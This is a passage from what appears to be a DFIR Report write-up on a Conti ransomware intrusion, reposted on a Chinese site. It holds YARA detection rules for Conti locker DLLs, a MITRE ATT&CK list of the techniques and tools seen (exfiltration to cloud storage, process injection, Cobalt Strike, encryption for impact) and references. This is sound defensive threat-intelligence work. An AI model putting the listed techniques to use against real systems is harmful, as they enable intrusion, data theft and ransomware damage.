$s9 = "6#606B6" fullword ascii /* Goodware String - occured 1 times */
$s10 = "<!=X=u=" fullword ascii /* Goodware String - occured 1 times */
$s11 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */
$s12 = "6!7?7J7" fullword ascii /* Goodware String - occured 2 times */
$s13 = "delete" fullword ascii /* Goodware String - occured 2789 times */
$s14 = "4!4(4/464=4D4K4R4Z4b4j4v4" fullword ascii /* Goodware String - occured 3 times */
$s15 = ".CRT$XIAC" fullword ascii /* Goodware String - occured 3 times */
$s16 = "0#0)01060\\0a0" fullword ascii
$s17 = ";\";/;=;K;V;l;" fullword ascii
$s18 = "6,606P6X6\\6x6" fullword ascii
$s19 = "6(6,6@6D6H6L6P6T6X6\\6`6d6p6t6x6|6" fullword ascii
$s20 = "8 :M:}:" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 600KB and
( pe.imphash() == "50472e0ba953856d228c7483b149ea72" or all of them )
}
rule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86 {
meta:
description = "conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86.dll"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-11-29"
hash1 = "01a9549c015cfcbff4a830cea7df6386dc5474fd433f15a6944b834551a2b4c9"
strings:
$s1 = "conti_v3.dll" fullword ascii
$s2 = "AppPolicyGetProcessTerminationMethod" fullword ascii
$s3 = "6 7/787E7[7" fullword ascii /* hex encoded string 'gx~w' */
$s4 = "operator co_await" fullword ascii
$s5 = "2%3.3f3~3" fullword ascii /* hex encoded string '#?3' */
$s6 = "1\"1&1,:4:<:D:L:T:\\:d:l:t:|:" fullword ascii $s7 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide $s8 = "SVWjEhQ" fullword ascii $s9 = "__swift_2" fullword ascii $s10 = "__swift_1" fullword ascii $s11 = "api-ms-win-core-file-l1-2-2" fullword wide /* Goodware String - occured 1 times */ $s12 = "7K7P7T7X7\\7" fullword ascii /* Goodware String - occured 1 times */ $s13 = "7h7o7v7}7" fullword ascii /* Goodware String - occured 1 times */ $s14 = "O0a0s0" fullword ascii /* Goodware String - occured 1 times */ $s15 = ";?;I;S;" fullword ascii /* Goodware String - occured 1 times */ $s16 = "8>8C8Q8V8" fullword ascii /* Goodware String - occured 1 times */
$s17 = "QQSVj8j@" fullword ascii
$s18 = "5-5X5s5" fullword ascii /* Goodware String - occured 1 times */
$s19 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */
$s20 = "delete" fullword ascii /* Goodware String - occured 2789 times */
condition:
uint16(0) == 0x5a4d and filesize < 600KB and
( pe.imphash() == "749dc5143e9fc01aa1d221fb9a48d5ea" or all of them )
}
rule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64 {
meta:
description = "conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64.dll"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-11-29"
hash1 = "31656dcea4da01879e80dff59a1af60ca09c951fe5fc7e291be611c4eadd932a"
strings:
$s1 = "conti_v3.dll" fullword ascii
$s2 = "AppPolicyGetProcessTerminationMethod" fullword ascii
$s3 = "operator co_await" fullword ascii
$s4 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
$s5 = "api-ms-win-core-file-l1-2-2" fullword wide /* Goodware String - occured 1 times */
$s6 = "__swift_2" fullword ascii
$s7 = "__swift_1" fullword ascii
$s8 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */
$s9 = "u3HcH<H" fullword ascii /* Goodware String - occured 2 times */
$s10 = "D$XD9x" fullword ascii /* Goodware String - occured 2 times */
$s11 = "delete" fullword ascii /* Goodware String - occured 2789 times */
$s12 = "ue!T$(H!T$ " fullword ascii
$s13 = "L$&8\\$&t,8Y" fullword ascii
$s14 = "F 2-by" fullword ascii
$s15 = "u\"8Z(t" fullword ascii
$s16 = "L$ |+L;" fullword ascii
$s17 = "vB8_(t" fullword ascii
$s18 = "ext-ms-" fullword wide
$s19 = "OOxq*H" fullword ascii
$s20 = "H97u+A" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 600KB and
( pe.imphash() == "137fa89046164fe07e0dd776ed7a0191" or all of them )
}MITRE
T1218.010 - Signed Binary Proxy Execution: Regsvr32
T1218.005 - Signed Binary Proxy Execution: Mshta
T1218.011 - Signed Binary Proxy Execution: Rundll32
T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1105 - Ingress Tool Transfer
T1059.005 - Command and Scripting Interpreter: Visual Basic
T1059.007 - Command and Scripting Interpreter: JavaScript
T1059.001 - Command and Scripting Interpreter: PowerShell
T1055 - Process Injection
T1486 - Data Encrypted for Impact
T1482 - Domain Trust Discovery
T1047 - Windows Management Instrumentation
T1021.002 - Remote Services: SMB/Windows Admin Shares
T1124 - System Time Discovery
T1021.001 - Remote Services: Remote Desktop Protocol
T1566.001 - Phishing: Spearphishing Attachment
T1087.002 - Account Discovery: Domain Account
T1087.001 - Account Discovery: Local Account
T1057 - Process Discovery
T1083 - File and Directory Discovery
T1590.005 - Gather Victim Network Information: IP AddressesMITRE Software
Net – S0039
Nltest – S0359
Cmd – S0106
Tasklist – S0057
Cobalt Strike – S0154
AdFind - S0552Reference
- Detecting Rclone – An Effective Tool for Exfiltration, NCC Group
- Rundll32, Red Canary
- TA551 (Shathak) continues pushing BazarLoader, infections lead to Cobalt Strike, SANS ISC
- Invoke-ShareFinder, GitHub [Veil PowerView]
- taskmgr.exe slashing numbers, Hexicorn
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/1774/
暫無評論